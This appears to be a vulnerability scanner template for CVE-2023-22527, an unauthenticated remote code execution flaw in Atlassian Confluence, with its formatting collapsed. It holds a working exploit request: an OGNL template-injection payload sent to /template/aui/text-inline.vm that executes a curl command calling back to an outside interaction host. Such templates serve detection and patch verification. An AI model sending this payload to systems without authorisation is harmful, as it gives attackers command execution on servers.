CVE-2023-22527

id: CVE-2023-22527info:  name: Atlassian Confluence - Remote Code Execution  author: iamnooob,rootxharsh,pdresearch  severity: critical  description: |    A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.    Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.  reference:    - https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615    - https://jira.atlassian.com/browse/CONFSERVER-93833    - https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/  classification:    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H    cvss-score: 10    cve-id: CVE-2023-22527    epss-score: 0.00044    epss-percentile: 0.08115    cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*  metadata:    max-request: 1    vendor: atlassian    product: confluence_data_center    shodan-query: http.component:"Atlassian Confluence"  tags: cve,cve2023,confluence,rce,sstihttp:  - raw:      - |+        POST /template/aui/text-inline.vm HTTP/1.1        Host: {{Hostname}}        Accept-Encoding: gzip, deflate, br        Content-Type: application/x-www-form-urlencoded        label=u0027%2b#requestu005bu0027.KEY_velocity.struts2.contextu0027u005d.internalGet(u0027ognlu0027).findValue(#parameters.x,{})%2bu0027&x=(new freemarker.template.utility.Execute()).exec({"curl {{interactsh-url}}"})    matchers-condition: and    matchers:      - type: word        words:          - 'Empty{name='      - type: word        part: interactsh_protocol        words:          - dns